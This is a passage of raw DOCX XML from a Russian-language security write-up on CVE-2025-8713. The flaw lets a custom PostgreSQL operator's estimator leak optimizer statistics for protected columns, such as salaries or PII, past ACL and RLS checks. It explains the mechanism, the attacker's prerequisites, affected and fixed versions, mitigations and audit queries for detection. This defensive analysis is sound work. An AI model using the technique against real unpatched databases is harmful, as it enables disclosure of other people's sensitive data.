      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--   ↑ возвращает selectivity (любое значение), но в side-effect — leaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD6604" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F6460" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--   Seq Scan with ACL check / RLS filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA5DD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--   → 0 rows (атакующий не имеет прав)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEC5F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leak target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно top 100 most frequent values per column (зависит от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default_statistics_target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GUC). Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>annual_salary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это top 100 salary amounts в company — sensitive information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D6BCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Information disclosure of statistics-sampled data из чужих columns. Не full table read, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leak of representative values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для PII (emails, phone numbers, addresses), salaries, financial data, или patterns (e.g., наиболее часто встречающиеся password hashes если они таблично хранятся). Severity зависит от какие columns в БД содержат sensitive data и попадают в statistics-sample.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D4D80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>CVE advisory wording: *"Custom operators with arbitrary side-effects in their estimator functions could bypass view ACL and RLS through optimizer statistics."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2D98E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC0DCF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с language C от user-роли — критичный red flag (требует superuser для C-функций; альтернативно — plpgsql с side-channels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9313D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_operator</w:t>
      </w:r>
      <w:r>
        <w:t>: новые operators в user-schemas, особенно с custom restrict/join functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12DEA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t>: queries использующие unusual operators (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@@@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>???</w:t>
      </w:r>
      <w:r>
        <w:t>, custom symbols) против tables со sensitive columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F3AEDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Application logs: queries формально returning 0 rows, но execution time anomalously high (planning side-channel).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A882F18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL planner вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>restrict-selectivity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>join-selectivity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> estimator-functions для custom operators при building query plan. Эти estimators имеют доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>internal optimizer API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который включает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>get_attstatsslot()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583B19D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optimizer reads statistics </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до executor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, до применения ACL и RLS. По дизайну это OK: planner оптимизирует план, statistics — internal information для cost estimation. Bug в том, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom estimator может exfiltrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sampled data через side-effects (writing к file, generating timing differences, embedding в error message).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841C4A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL до фикса не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>restricted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> custom estimators от accessing statistics of columns user doesn't have SELECT permission on. Фикс — добавил проверку: при reading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через optimizer-API, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>applied ownership check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (column owner или SELECT permission required).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2214BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Точный механизм фикса в release notes 17.6 (август 2025): *"Restrict reading of pg_statistic entries to columns owner or with SELECT permission."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C823084" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade на patched PG-версию</w:t>
      </w:r>
      <w:r>
        <w:t>. Mitigations для непатченных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798BDE9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не давать CREATE на schemas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычным пользователям (PG 15+ default для public — already revoked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E822C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit `pg_operator`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на новые operators в user-schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589E103" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на functions с LANGUAGE C от non-DBA (хотя creating C-funcs всё равно требует superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A11F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF534C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 17.5, 16.9, 15.13, 14.18, 13.21 (фикс 14.08.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8B510B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CREATE на schema + CREATE OPERATOR/FUNCTION privileges. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для basic exploit; superuser для C-language functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B0E2F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sensitive columns в БД с ACL restrictions ИЛИ RLS policies + atttribute-statistics enabled (default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FF307B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Side-channel для leakage</w:t>
      </w:r>
      <w:r>
        <w:t>: required (timing, error message, или log-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3E555" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-блок.</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479F" w14:paraId="153EDBE8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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0B1C805" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Поле</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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F532EFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="494605F9"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872302" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</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56C165" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-8713</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="16C8365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6009D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS 3.1</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660B31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(не указан в advisory; GBHackers оценивает как Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6FEA1E36"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D94B6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Опубликовано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2F4155" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14 августа 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0C44F3E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95F0A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Затронуто</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3D49CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 17.5, 16.9, 15.13, 14.18, 13.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6CAD0040"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4C86E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</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E04467" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 17.6, 16.10, 15.14, 14.19, 13.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="74C205BD"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EF997A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Тип</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DFAB78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Custom operator estimator bypass column ACL / RLS через optimizer statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4A49F87A"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631A1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Категория</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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EDF7D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Information disclosure через side-channel в planning phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12CE4673" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Custom operators — стандартный extension mechanism PostgreSQL. Many extensions create them legitimately (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для similarity, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgvector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для embedding, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для spatial). Estimator-functions для cost estimation — accepted pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71735C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Legitimate использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не leaks statistics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартные estimators (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eqsel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>neqsel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scalarltsel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для built-in operators) работают с column statistics безопасно, потому что они </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>встроены в server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и не have side-effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31635223" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Issue появляется только когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom estimator function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет side-effect (logging, network call, error embedding). Это паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>malicious extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deliberate exfiltration vector</w:t>
      </w:r>
      <w:r>
        <w:t>, не legitimate use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52C7A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C241AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_operator` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM pg_operator WHERE oprcode NOT IN (system functions)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — non-system operators в user-schemas. На clean install user-defined operators редки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5EC59F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на estimator-functions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
